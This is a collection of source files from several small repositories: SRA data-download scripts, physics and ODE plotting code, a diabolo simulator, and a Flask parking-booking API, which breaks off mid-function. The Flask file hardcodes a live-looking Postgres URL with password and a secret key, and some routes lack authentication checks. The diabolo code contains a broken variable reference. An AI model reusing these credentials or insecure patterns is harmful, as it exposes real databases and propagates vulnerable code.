"text": "for i in {279..306}\ndo\n#wget ftp://ftp-trace.ncbi.nlm.nih.gov/sra/sra-instant/reads/ByStudy/sra/SRP/SRP070/SRP070710/SRR3184${i}/SRR3184${i}.sra\nascp -k 1 -T -i ~/asperaweb_id_dsa.openssh [email protected]:/sra/sra-instant/reads/ByStudy/sra/SRP/SRP070/SRP070710/SRR3184${i}/SRR3184${i}.sra .\ndone\n"
},
{
"alpha_fraction": 0.6830601096153259,
"alphanum_fraction": 0.6958105564117432,
"avg_line_length": 17.86206817626953,
"blob_id": "3395e021f84614cc8350fdbc33010e14ff3bab95",
"content_id": "f6290a34c681432046ca179fbc715ff394fbba6a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 549,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 29,
"path": "/random_peak",
"repo_name": "zhuyezhang/mycode-Shen",
"src_encoding": "UTF-8",
"text": "#!/nethome/yezhang_zhu/miniconda2/bin/python\n\nimport sys\nimport random\n\nif len(sys.argv)<3:\n\tprint(\"Usage:random_peak peaklist random_number\")\n\texit(0)\n\npeak=[]\nwith open(sys.argv[1]) as infile:\n\tfor line in infile.readlines():\n\t\tline=line.strip()\n\t\tpeak.append(line)\ninfile.close()\n\nrecord=open('peakfile','w')\n\nnumber=int(sys.argv[2])\nfor i in range(number):\n\toutput=\"peaklist_\"+str(i)\n\tout=open(output,'w')\n\tslice = random.sample(peak, 50)\n\toutline='\\n'.join(slice)\n\tout.write(outline)\n\tout.close()\t\t\n\trecord.write(output+'\\n')\n\nrecord.close()\t\t\n"
},
{
"alpha_fraction": 0.6734177470207214,
"alphanum_fraction": 0.7088607549667358,
"avg_line_length": 25.33333396911621,
"blob_id": "c7d46ed557c192a5297eefe1d937a5f00ed718ef",
"content_id": "be1d6d5b3395e61fbd3e0714774c01377f865abf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 395,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 15,
"path": "/norm_macs14",
"repo_name": "zhuyezhang/mycode-Shen",
"src_encoding": "UTF-8",
"text": "#!/nethome/yezhang_zhu/miniconda2/bin/python\n\nimport pandas as pd\nimport sys\n\nif len(sys.argv)<3:\n\tprint('Usage:norm_macs14 <wigfile> <wigfile_out>')\n\texit(0)\n\nnames=[\"position\",\"reads\"]\ndf=pd.read_table(sys.argv[1],sep=\"\\t\",names=names,low_memory=False)\nsum=df['reads'].sum(skipna=True)\ndf['reads']=df['reads']*1000000/sum\ndf.to_csv(sys.argv[2],sep=\"\\t\",index=False,header=False)\ndf.describe()\n"
},
{
"alpha_fraction": 0.6415094137191772,
"alphanum_fraction": 0.6561844944953918,
"avg_line_length": 19.7391300201416,
"blob_id": "a6ba414a0ca1dc67525e43feb2f77d3d1cdc3054",
"content_id": "6d4596ec3ff1d978184fc49e8e41b6ff9902d97e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 477,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 23,
"path": "/get_gene_from_ceas",
"repo_name": "zhuyezhang/mycode-Shen",
"src_encoding": "UTF-8",
"text": "#!/nethome/yezhang_zhu/miniconda2/bin/python\n\nimport sys\n\nif len(sys.argv)<3:\n\tprint(\"Usage:get_gene_from_ceas <ceas.xls> <output_genename>\")\n\texit(0)\n\noutput=open(sys.argv[2],'w')\nwith open(sys.argv[1]) as infile:\n\tfor line in infile.readlines():\n\t\tif line.startswith('#') or line=='\\n':\n\t\t\tpass\n\t\telse:\n\t\t\tline_split=line.split('\\t')\n\t\t\tnumbers=[float(a) for a in line_split[9:]]\n\t\t\tif sum(numbers)==0:\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\toutput.write(line)\n\noutput.close()\ninfile.close()\n"
}
] | 19 |
JosephAFuentes/Oscillation-Vibration-Practice | https://github.com/JosephAFuentes/Oscillation-Vibration-Practice | 37a3a4455be70f6a04c8f8a9456548d19bbebe4a | 86586fdf52593ab9bb04c15959ce9cbc7a1e24de | c955169ced55b6c60e332ab7153200ee4e335d39 | refs/heads/master | 2021-07-03T13:51:38.362751 | 2017-09-20T03:40:25 | 2017-09-20T03:40:25 | 104,161,936 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6221945285797119,
"alphanum_fraction": 0.647132158279419,
"avg_line_length": 30.57480239868164,
"blob_id": "3d8216eeeaa5b98e10cc74e230499be75b11bfd7",
"content_id": "d154a0d92cf0033b2f3629fa6bc795b7759c04bb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4010,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 127,
"path": "/2nd_order_frequency_response_force_input.py",
"repo_name": "JosephAFuentes/Oscillation-Vibration-Practice",
"src_encoding": "UTF-8",
"text": "'''2nd Order step response\n my'' +cy' +ky = f\n'''\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.integrate import odeint\n\ndef eq_of_motion(w, t, p):\n \"\"\"\n Defines the differential equations for the direct-force mass-spring-damper system.\n\n Arguments:\n w : vector of the state variables:\n t : time\n p : vector of the parameters:\n \"\"\"\n x, x_dot = w\n m, k, c, StartTime, F_amp = p\n\n # Create sysODE = (x', x_dot')\n sysODE = [x_dot,\n -k/m * x - c/m * x_dot + f(t, p)/m]\n return sysODE\n\n\ndef f(t, p):\n \"\"\"\n defines the disturbance force input to the system\n \"\"\"\n m, k, c, StartTime, F_amp = p\n \n # Select one of the two inputs below\n # Be sure to comment out the one you're not using\n \n # Input Option 1: \n # Just a step in force beginning at t=DistStart\n # f = F_amp * (t >= DistStart)\n \n # Input Option 2:\n # A pulse in force beginning at t=StartTime and ending at t=(StartTime + 0.5)\n f = F_amp * (t >= StartTime) * (t <= StartTime + 0.5) + 5 * (t >= StartTime+0.25) * (t <= StartTime + 0.5)\n \n return f\n\n# Define the System Parameters\nm = 1.0 # kg\nk = (2.0 * np.pi)**2 # N/m (Selected to give an undamped natrual frequency of 1Hz)\nwn = np.sqrt(k / m) # Natural Frequency (rad/s)\n\nz = 0.1 # Define a desired damping ratio\nc = 2 * z * wn * m # calculate the damping coeff. to create it (N/(m/s))\n\n# Set up simulation parameters\n\n# ODE solver parameters\nabserr = 1.0e-9\nrelerr = 1.0e-9\nmax_step = 0.01\nstoptime = 10.0\nnumpoints = 10001\n\n# Create the time samples for the output of the ODE solver\nt = np.linspace(0.0, stoptime, numpoints)\n\n# Initial conditions\nx_init = 0.0 # initial position\nx_dot_init = 0.0 # initial velocity\n\n# Set up the parameters for the input function\nStartTime = 0.5 # Time the f(t) input will begin\nF_amp = 10.0 # Amplitude of Disturbance force (N)\n\n# Pack the parameters and initial conditions into arrays \np = [m, k, c, StartTime, F_amp]\nx0 = [x_init, x_dot_init]\n\n# Call the ODE solver.\nresp = odeint(eq_of_motion, x0, t, args=(p,), atol=abserr, rtol=relerr, hmax=max_step)\n\n# Make the figure pretty, then plot the results\n# \"pretty\" parameters selected based on pdf output, not screen output\n# Many of these setting could also be made default by the .matplotlibrc file\n\n# Set the plot size - 3x2 aspect ratio is best\nfig = plt.figure(figsize=(6, 4))\nax = plt.gca()\nplt.subplots_adjust(bottom=0.17, left=0.17, top=0.96, right=0.96)\n\n# Change the axis units to serif\nplt.setp(ax.get_ymajorticklabels(),family='serif',fontsize=18)\nplt.setp(ax.get_xmajorticklabels(),family='serif',fontsize=18)\n\nax.spines['right'].set_color('none')\nax.spines['top'].set_color('none')\n\nax.xaxis.set_ticks_position('bottom')\nax.yaxis.set_ticks_position('left')\n\n# Turn on the plot grid and set appropriate linestyle and color\nax.grid(True,linestyle=':',color='0.75')\nax.set_axisbelow(True)\n\n# Define the X and Y axis labels\nplt.xlabel('Time (s)', family='serif', fontsize=22, weight='bold', labelpad=5)\nplt.ylabel('Position', family='serif', fontsize=22, weight='bold', labelpad=10)\n\n# Plot the first element of resp for all time. It corresponds to the position.\nplt.plot(t, resp[:,0], linewidth=2, linestyle = '-', label=r'Response')\n\n# uncomment below and set limits if needed\n# xlim(0,5)\n# ylim(0,10)\n\n# # Create the legend, then fix the fontsize\n# leg = plt.legend(loc='upper right', fancybox=True)\n# ltext = leg.get_texts()\n# plt.setp(ltext,family='serif',fontsize=18)\n\n# Adjust the page layout filling the page using the new tight_layout command\nplt.tight_layout(pad = 0.5)\n\n# save the figure as a high-res pdf in the current folder\n# It's saved at the original 6x4 size\n# plt.savefig('MCHE485_DirectForcePulseWithDamping.pdf')\n\nfig.set_size_inches(9, 6) # Resize the figure for better display in the notebook\nplt.show()\n"
},
{
"alpha_fraction": 0.5395604372024536,
"alphanum_fraction": 0.5945054888725281,
"avg_line_length": 21.19512176513672,
"blob_id": "acda2c1432858e4cdb286fb1c3d3e5df863a800a",
"content_id": "a0acbb2f6680b8afd37df47f33247c0e89d3f330",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 910,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 41,
"path": "/scipy_ODE.py",
"repo_name": "JosephAFuentes/Oscillation-Vibration-Practice",
"src_encoding": "UTF-8",
"text": "'''m y''-(3x+2)y'+(6x-8)y=0, y(0)=2, y'(0)=3\n'''\nimport numpy as np\nimport scipy as sp\nfrom scipy.integrate import odeint\nimport matplotlib.pyplot as plt\nm = 1\nk = (2.0*np.pi)**2\n\nwn = np.sqrt(k/m) # Natural Frequency (rad/s)\n\nz = 0.25 # Define a desired damping ratio\nc = 2*z*wn*m \n\ndef g(y, x):\n global m\n global c\n global k\n y0 = y[0]\n y1 = y[1]\n y2 = (c*(-y1)+k*(x))/(m)\n return y1, y2\n\n# Initial conditions on y, y' at x=0\ninit = 0, 0\n# First integrate from 0 to 2\nx = np.linspace(0,2,100)\nsol=odeint(g, init, x)\n# Then integrate from 0 to -2\nplt.plot(x, sol[:,0], color='b')\nx = np.linspace(0,-2,100)\nsol=odeint(g, init, x)\nplt.plot(x, sol[:,0], color='b')\n\n# The analytical answer in red dots\nexact_x = np.linspace(-2,2,10)\nexact_y = 2*np.exp(2*exact_x)-exact_x*np.exp(-exact_x)\nplt.plot(exact_x,exact_y, 'o', color='r', label='exact')\nplt.legend()\n\nplt.show()\n"
},
{
"alpha_fraction": 0.5847750902175903,
"alphanum_fraction": 0.6470588445663452,
"avg_line_length": 16,
"blob_id": "cc454d415916b8c4e3f2503432c6f75013ce3555",
"content_id": "3d62cfd18440844312ea67d886e4bb52d3020820",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 289,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 17,
"path": "/1st_order_step_response.py",
"repo_name": "JosephAFuentes/Oscillation-Vibration-Practice",
"src_encoding": "UTF-8",
"text": "'''TFirst order step Response and plotting\n DE: y'+5y = 1'''\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nt = np.linspace(0,10)\n\ny = 0.2-0.2*np.e**(-5*t)\nplt.plot(t,y)\n# Set y limits\nplt.ylim(0, 0.3)\n\n# Set y ticks\nplt.yticks(np.linspace(0, 0.3, 10, endpoint=True))\nplt.show()\n"
}
] | 3 |
jamesshapiro/python-experiments | https://github.com/jamesshapiro/python-experiments | 999b5b731f1e2bb546b6a20ef3075e5ca33324ac | d54c8f40585c7ca7c636711a9c2b379fe7f2b3cb | dd3df7eb01d7534f65a4d0b1009424a523199fe7 | refs/heads/master | 2021-01-19T02:26:16.350649 | 2017-04-06T04:06:41 | 2017-04-06T04:06:41 | 87,277,488 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4658169150352478,
"alphanum_fraction": 0.5249130725860596,
"avg_line_length": 19.5238094329834,
"blob_id": "0d573ab2de2ca2e4e3d0ec821e4a4f0cdc03efaa",
"content_id": "f7250b34e395f4d3ab05acd1aebdc42a35ef503a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 863,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 42,
"path": "/comprehensions1.py",
"repo_name": "jamesshapiro/python-experiments",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n\"\"\"\nFile: hello.py\n\n[0, 1, 2, 3] -> [1, 3, 5, 7]\n\n[3, 5, 9, 8] -> [True, False, True, False]\n\nrange(10) -> [2, 3, 5, 7]\n\n['apple', 'orange', 'pear'] -> ['A', 'O', 'P']\n\n['apple', 'orange', 'pear'] -> ['apple', 'pear']\n\n['apple', 'orange', 'pear'] ->\n\n[('apple', 5), ('orange', 6), ('pear', 4)]\n\"\"\"\nimport math\ndef is_prime(n):\n if n == 2:\n return True\n for i in range(2,int(math.ceil(math.sqrt(n))+1)):\n if n % i == 0:\n return False\n return True\n\ncomp1 = [(x*2)+1 for x in range(4)]\ncomp2 = [x % 3 == 0 for x in [3, 5, 9, 8]]\ncomp3 = [x for x in range(2,10) if is_prime(x)]\n\nbasket = ['apple', 'orange', 'pear']\ncomp4 = [x[0].upper() for x in basket]\ncomp5 = [x for x in basket if len(x) < 6]\ncomp6 = [(x, len(x)) for x in basket]\n\nprint(comp1)\nprint(comp2)\nprint(comp3)\nprint(comp4)\nprint(comp5)\nprint(comp6)\n\n"
},
{
"alpha_fraction": 0.6772152185440063,
"alphanum_fraction": 0.6851266026496887,
"avg_line_length": 21.535715103149414,
"blob_id": "f5c814daec3fda5ca600c158945da0219fcefaed",
"content_id": "81d9ba378c7d8a8fbcda07151ed68655c4536219",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 632,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 28,
"path": "/dict-key.py",
"repo_name": "jamesshapiro/python-experiments",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\n\"\"\"\nFile: dict-key.py\n\nExperiment to remind myself that Python uses \"==\" rather than \"is\"\nwhen comparing keys in a dictionary.\n\nOutput:\nfirst_cat == second_cat? True!\nfirst_cat is second_cat? False!\nAmerican Shorthair\nzero point zero\n\"\"\"\n\ndict = {}\nfirst_cat = \"cat\"\nsecond_cat = \"ca\"\nsecond_cat = second_cat + \"t\"\nprint(\"first_cat == second_cat: {}\".format(first_cat == second_cat))\nprint(\"first_cat is second_cat: {}\".format(first_cat is second_cat))\ndict[first_cat] = \"Siamese\"\ndict[second_cat] = \"American Shorthair\"\nprint(dict[first_cat])\n\ndict[0] = 'zero'\ndict[0.0] = 'zero point zero'\nprint(dict[0])\n\n"
}
] | 2 |
felixvd/Diabolo | https://github.com/felixvd/Diabolo | 144a17bc1b203965a7baf168ab1bebc296945ce2 | 561ca08c9f4b7f239ea4bb2cf853d614a5851916 | a590f4b31522230a5343cd850aa1601b575df630 | refs/heads/master | 2023-06-24T14:24:41.081194 | 2021-07-15T22:24:59 | 2021-07-15T22:24:59 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5071102976799011,
"alphanum_fraction": 0.5484303832054138,
"avg_line_length": 37.41237258911133,
"blob_id": "63e781d4ff769ca906416a7cf638503f50d27508",
"content_id": "06b3073d30652de357dbc6fa259bf086ff805884",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3727,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 97,
"path": "/env.py",
"repo_name": "felixvd/Diabolo",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\n\"\"\"\nThis file contains a environment for the 2D diabolo simulator:\nThe equations of motions of the diabolo can be viewed on \nhttps://www.overleaf.com/project/60c7b833bac7280c1b660be8\n\"\"\"\n\n\ndef update_position(pos_t_d, dot_pos_t_d, pos_t_s, dot_pos_t_s, l, wt, deltat=0.00001, g=9.8):\n \"\"\"\n Update the position of the diaoblo and the stick tips\n\n Args:\n pos_t_d: the position of the diabolo at time t\n a tuple with two elements, (diabolo_pos_xt, diabolo_pos_yt)\n dot_pos_t_d: the velocity of the diabolo at time t, \n a tuple with two elements, (dot_diabolo_pos_xt, dot_diabolo_pos_yt)\n pos_t_s: the positions of the stick tip at time t\n a tuple with four elements, (left_stick_pos_xt, left_stick_pos_yt, right_stick_pos_xt, right_stick_pos_yt)\n dot_pos_t_s: the velocity of the stick tip at time t\n a tuple with four elements, (dot_left_stick_pos_xt, dot_left_stick_pos_yt, dot_right_stick_pos_xt, dot_right_stick_pos_yt)\n l: the length of the string, a scalar\n wt: the rotational speed of the diabolo, a scalar\n deltat: the time interval for the velocity verlet algorithm\n g: the gravitional constant\n\n Return:\n pos_t_d\n dot_pos_t_d\n pos_t_s\n dot_pos_t_s\n wt\n \"\"\"\n xt_d, yt_d = pos_t_d\n dot_xt_d, dot_yt_d = dot_pos_t_d\n xt_l_s, yt_l_s, xt_r_s, yt_r_s = pos_t_s \n\n # Step1: Unconstrained position, with velocity-verlet euler integration\n xtplus1_d = xt_d + dot_xt_d * deltat\n ytplus1_d = yt_d + dot_yt_d * deltat - 0.5 * g * deltat**2\n\n # Step2: Constrain Position due to string\n ## Compute the center of the two sticks at time t\n x_center = (xt_l_s + xt_r_s) / 2.\n y_center = (yt_l_s + yt_r_s) / 2.\n ## Compute the parameters of the line\n m = (ytplus1_d-y_center)/(xtplus1_d-x_center)\n n = -1\n p = y_center - m * x_center\n ## Compute the parameters of the ellipse define by the two stick tips\n a = l/2.\n b = np.sqrt(a**2-(np.abs(xt_l_s-xt_r_s)/2)**2)\n ## Project the new position to the tangent plane of the ellipse\n if a**2*m**2+b**2*n**2 != 0 and n!=0 and a*b != 0:\n x_tmp1 = np.sqrt(a**2*b**2*n**2*(a**2*m**2+b**2*n**2-p**2))+a**2*m*p\n x_tmp1 = x_tmp1 / (a**2*m**2+b**2*n**2)\n y_tmp1 = m*np.sqrt(a**2*b**2*n**2*(a**2*m**2+b**2*n**2-p**2))-b**2*n**2*p\n y_tmp1 = y_tmp1 / (a**2*m**2*n+b**2*n**3)\n\n x_tmp2 = np.sqrt(a**2*b**2*n**2*(a**2*m**2+b**2*n**2-p**2))-a**2*m*p\n x_tmp2 = x_tmp2 / (a**2*m**2+b**2*n**2)\n y_tmp2 = -(m*np.sqrt(a**2*b**2*n**2*(a**2*m**2+b**2*n**2-p**2))+b**2*n**2*p)\n y_tmp2 = y_tmp2 / (a**2*m**2*n+b**2*n**3)\n\n if x_tmp1*xtplus1_d > 0 and y_tmp1*ytplus1_d > 0:\n x_c, y_c = x_tmp1, y_tmp1\n else:\n x_c, y_c = x_tmp2, y_tmp2\n\n if n == 0 and m != 0 and a != 0 and b!=0:\n x_c = p / m\n y_tmp1 = b*np.sqrt(a**2-p**2/m**2)/a\n y_tmp2 = -b*np.sqrt(a**2-p**2/m**2)/a\n \n if y_tmp1*ytplus1_d > 0:\n y_c = y_tmp1\n else:\n y_c = y_tmp2\n\n # Step3: Add pull velocity if the sticks are moving\n if np.linalg.norm(dot_pos_t_s) > 1e-2:\n v_pull = (x_c - xtplus1_d, y_c - ytplus1_d)\n dot_pos_t_d = (dot_pos_t_d[0]+v_pull[0], dot_pos_t_d[1]+v_pull[1])\n\n # Step4: Constrain velocity\n u = -b**2*c_c / (a**2*y_c)\n v = np.array(dot_pos_t_d)\n n = np.array([0, y_c-u*x_c])\n if np.cross(v, n) < 0:\n cos_vn = np.inner(v,n)/(np.linalg.norm(v)*np.linalg.norm(n))\n v_c = v * cos_vn\n dot_pos_t_d = v_c\n \n # Update rotational velocity \n\n return pos_t_d, dot_pos_t_d, pos_t_s, dot_pos_t_s, wt \n"
}
] | 1 |
NguyenHuy1812/ParkingHero-Back | https://github.com/NguyenHuy1812/ParkingHero-Back | 4e9f16510d2ce1bc5dfca5fa8df65b48afd9812b | e7294863d1ddb0d6974a86de2fb75cf55312019c | 7272db3990eecd5a3996e580b3fba72dab3ce8b1 | refs/heads/master | 2022-03-26T03:58:07.903349 | 2019-07-31T04:55:48 | 2019-07-31T04:55:48 | 199,775,295 | 0 | 0 | MIT | 2019-07-31T04:00:15 | 2019-07-31T04:56:00 | 2022-04-06T18:51:14 | Python | [
{
"alpha_fraction": 0.6216534376144409,
"alphanum_fraction": 0.6264973282814026,
"avg_line_length": 39.412696838378906,
"blob_id": "47f077b48be4b0dd87c7a0b45128abeb416b94fd",
"content_id": "9ab6348f96f46dc1e99a51be47dbcce320a38a4d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15277,
"license_type": "permissive",
"max_line_length": 260,
"num_lines": 378,
"path": "/app/__init__.py",
"repo_name": "NguyenHuy1812/ParkingHero-Back",
"src_encoding": "UTF-8",
"text": "import os\nfrom flask import Flask, redirect, url_for, flash, render_template, jsonify,request\nfrom flask_login import login_required, logout_user,current_user, login_user\nfrom .config import Config\nfrom .oauth import blueprint\nfrom .cli import create_db\nfrom sqlalchemy.orm.exc import NoResultFound\nfrom .models import db, User, OAuth, Token\nimport requests\nfrom .models import db,User, login_manager,User,UserMixin ,ProfileUser, Building ,ma , UserSchema, Price, Transaction, Parking,BuildingSchema ,TransactionSchema\nfrom .forms import SignupForm, SigninForm, EditProfileForm\nfrom flask_dance.consumer.storage.sqla import SQLAlchemyStorage\nfrom flask_cors import CORS , cross_origin\nfrom flask_dance.contrib.facebook import make_facebook_blueprint\nfrom flask_migrate import Migrate\nimport wtforms_json\nimport uuid\nfrom sqlalchemy import func\nimport datetime\nfrom datetime import datetime, timedelta\nfrom flask_apscheduler import APScheduler\nfrom flask_qrcode import QRcode\nimport random\nwtforms_json.init()\n\napp = Flask(__name__)\n\n\n\ncors = CORS(app)\nmigrate = Migrate(app, db, compare_type = True)\napp.config.from_object(Config)\napp.register_blueprint(blueprint, url_prefix=\"/login\")\napp.cli.add_command(create_db)\ndb.app = app\ndb.init_app(app)\nqrcode =QRcode(app)\nlogin_manager.init_app(app)\n\nPOSTGRES = {\n 'user': 'mac',\n 'pw': None,\n 'db': 'updated',\n 'host': 'localhost',\n 'port': 5432,\n}\n\n\n# app.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://%(user)s:%(pw)s@%(host)s:\\\n# %(port)s/%(db)s' % POSTGRES\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgres://blahqbnzhzahuo:cfaca93d75d48febc299ffc00deff270c5a0e77c786af880e478da51d58ca485@ec2-174-129-220-12.compute-1.amazonaws.com:5432/dcp256gma5sjca' \napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config[\"SECRET_KEY\"] = '_5#y2L\"F4Q8z\\n\\xec]/'\n\nscheduler = APScheduler()\n\nscheduler.init_app(app)\n\nscheduler.start()\n\n\n\[email protected](\"/logout\", methods = ['POST', 'GET'])\n@login_required\ndef logout():\n if request.method ==\"POST\":\n cur_token = Token.query.filter_by(user_id = current_user.id).first()\n print(cur_token)\n db.session.delete(cur_token)\n db.session.commit()\n print('currrrrr', cur_token.uuid)\n logout_user()\n flash(\"You have logged out\")\n return redirect(url_for(\"index\"))\n\n\[email protected](\"/\")\ndef index():\n print('alolalalala')\n # cur_building = Building.query.filter_by(id = 1). first()\n # cur_user = User.query.filter_by(id = 1).first()\n # print('currrr', cur_user.parkings , cur_building)\n return render_template(\"home.html\")\n\n\[email protected](\"/booking\", methods = ['POST', 'GET'])\ndef booking():\n if request.method == 'POST':\n data = request.get_json()\n print(data['idx'], type(data['idx']))\n cur_parking = Parking.query.filter_by(id = data['idx']).first()\n print( cur_parking.book_by, current_user.id)\n if cur_parking.status =='Booked':\n # if current_user.id == cur_parking.book_by:\n cur_parking.status = 'Available'\n cur_parking.status_color = 'green'\n cur_parking.owneruser = None\n cur_parking.time_booking = None\n cur_parking.in_use_status = 'not_use'\n db.session.commit()\n else:\n time = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n cur_parking.status = \"Booked\"\n cur_parking.status_color = \"red\"\n cur_parking.book_by = current_user.id\n cur_parking.time_booking = time\n cur_parking.in_use_status = 'booking'\n db.session.commit()\n return jsonify (\"You are booking this lot\")\[email protected](\"/parking/checkin/<idx>\", methods = ['POST', 'GET'])\ndef checkin(idx):\n data = request.get_json()\n cur_parking = Parking.query.filter_by(id = data['idx']).first()\n cur_building= cur_parking.building_id\n time = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n cur_parking.in_use_status = 'using'\n new_transaction = Transaction(user = current_user.id, building = cur_building,\n parking = cur_parking.id , time_check_in = time , price = cur_parking.price,\n ticket_qrcode = \"http://vairen.aien.vn/images/aien-imgs/huongdan.png\")\n db.session.add(new_transaction)\n db.session.commit()\n return jsonify(\"Success Checkin!\")\[email protected](\"/parking/<park_id>/checkout/<trans_id>\", methods = ['POST', 'GET'])\ndef checkout(park_id , trans_id):\n data = request.get_json()\n cur_parking = Parking.query.filter_by(id = data['park_id']).first()\n cur_transaction = Transaction.query.filter_by(id = data['trans_id']).first()\n time = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n cur_transaction.time_check_out = time\n cur_transaction.status = 'success'\n db.session.commit()\n time_lot = int((cur_transaction.time_check_out - cur_transaction.time_check_in).total_seconds())/60\n cur_transaction.totalbill = int(time_lot * cur_transaction.price/60)\n if cur_transaction.totalbill == 0:\n cur_transaction.totalbill = cur_transaction.price\n cur_transaction.time_lot = str(time_lot)\n cur_parking.status = 'Available'\n cur_parking.in_use_status = 'not_use'\n cur_parking.status_color = 'green'\n cur_parking.time_booking = None\n cur_parking.book_by = None\n print('########################', time , cur_transaction.time_check_in , cur_transaction.time_lot)\n db.session.commit()\n\n return jsonify(\"Success Checkout!\")\n\[email protected](\"/parking/order\", methods = ['POST', 'GET'])\ndef list_order():\n if request.method == \"GET\": \n trans_schema = TransactionSchema()\n print(current_user)\n out_put = trans_schema.dump(current_user).data\n return jsonify({'data': out_put} ) \n\n\n \n\n\[email protected](\"/addparking\", methods = ['POST', 'GET'])\ndef addParking():\n if request.method == 'POST':\n data = request.get_json()\n if data['nums'] == 0:\n new_parking = Parking(name =data['name'], building_id = data['building_id'], status ='Available', price =data['price'])\n db.session.add(new_parking)\n db.session.commit()\n return jsonify('Success adding')\n else:\n for i in range (0,data['nums']):\n new_parking = Parking(name =data['name'], building_id = data['building_id'], status ='Available', price =data['price'])\n db.session.add(new_parking)\n db.session.commit()\n return jsonify('Success adding!')\n\n\n \[email protected](\"/parking/edit/<idx>\", methods = ['POST', 'GET'])\ndef edit_parking(idx):\n data = request.get_json()\n cur_parking = Parking.query.filter_by(id = idx).first()\n cur_parking.name = data['parkingname']\n cur_parking.price = data['parkingprice']\n db.session.commit()\n return jsonify(\"Updated...\")\n\[email protected](\"/deleteparking\",methods = ['POST','GET'])\ndef deleteParking():\n data = request.get_json()\n delete_park = Parking.query.filter_by(id = int(data['parking_id'])).first()\n cur_transaction = Transaction.query.filter_by(parking =int(data['parking_id']), status = 'Checkin').first()\n if cur_transaction is not None:\n cur_transaction.status = 'cancel_by_admin'\n else:\n pass\n db.session.delete(delete_park)\n db.session.commit()\n return jsonify('hello deleteddddd')\n\n\[email protected](\"/user/signup\", methods = ['POST', ' GET'])\ndef signup():\n if request.method == 'POST':\n form = SignupForm.from_json(request.json)\n # data = request.get_json()\n print('suifhawduihasiudhasiud', form)\n if form.validate():\n new_user = User(name = form.sname.data, email =form.semail.data)\n new_user.set_password(form.spassword.data)\n db.session.add(new_user)\n db.session.commit()\n new_add_user = User.query.filter_by(name = form.sname.data).first()\n new_profile = ProfileUser(user_id = new_add_user.id, address = form.saddress.data)\n db.session.add(new_profile)\n db.session.commit()\n return jsonify(\"success!\")\n # return redirect(\"http://localhost:3000/sign-in\")\n else:\n print('checkcekcekcekeckcekce!!!!!!')\n return jsonify(form.errors)\n return jsonify(\"success!\")\[email protected](\"/facebooklogin\")\ndef log():\n return render_template(\"home.html\")\n\[email protected](\"/user/signin\", methods =['POST', 'GET'])\ndef signin():\n if request.method == 'POST':\n form = SigninForm.from_json(request.json)\n if form.validate():\n log_user = User.query.filter_by(name=form.username.data).first()\n if log_user is None:\n error = \"Wrong username\"\n form.username.errors.append(error)\n return jsonify({'error': \"wrong username\"})\n elif not log_user.check_password(form.password.data):\n error = \"Wrong password\"\n form.password.errors.append(error)\n print('efhuiqehiuwefhwiuefhwieufwueifweiufhweiufhwiuefweuhif')\n return jsonify({'error': \"wrong password\"})\n else:\n login_user(log_user)\n token_query = Token.query.filter_by(user_id=current_user.id).first()\n if token_query is not None:\n token = token_query\n else: \n token = Token(user_id=current_user.id, uuid=str(uuid.uuid4().hex)) \n db.session.add(token)\n db.session.commit()\n return jsonify({ 'status': 'ok' , 'token': token.uuid})\n else:\n return jsonify(\"form.errors!\")\n return 'login Please'\n \n\[email protected](\"/get/data\", methods = ['POST', 'GET'])\ndef data_dumps():\n if request.method == \"GET\":\n user_schema = UserSchema()\n\n out_put = user_schema.dumps(current_user)\n return jsonify({'dataaa': out_put})\n\[email protected](\"/user/data\", methods = ['POST', 'GET'])\n@login_required\ndef data_user():\n if request.method == \"GET\": \n user_schema = UserSchema() \n cur_buidling = Building.query.filter_by(user = current_user.id).first()\n cur_time = datetime.now()\n cur_trans = Transaction.query.filter_by(user = current_user.id).all()\n trans_schema = TransactionSchema(many = True)\n # total_trans = Transaction.query.filter(Transaction.building == cur_buidling.id, Transaction.time_check_out < (cur_time - timedelta(days = 1)) ).with_entities( Transaction.building, func.sum(Transaction.totalbill)).group_by(Transaction.building).all()\n out_put = user_schema.dump(current_user).data\n trans_out_put = trans_schema.dump(cur_trans).data\n return jsonify({'data': out_put , 'transaction': trans_out_put}) \n else:\n form = EditProfileForm.from_json(request.json)\n data = request.get_json()\n print('datataatatfiatatatat', data)\n if form.validate():\n cur_profile = ProfileUser.query.filter_by(user_id = current_user.id).first()\n cur_profile.first_name = form.firstname.data\n 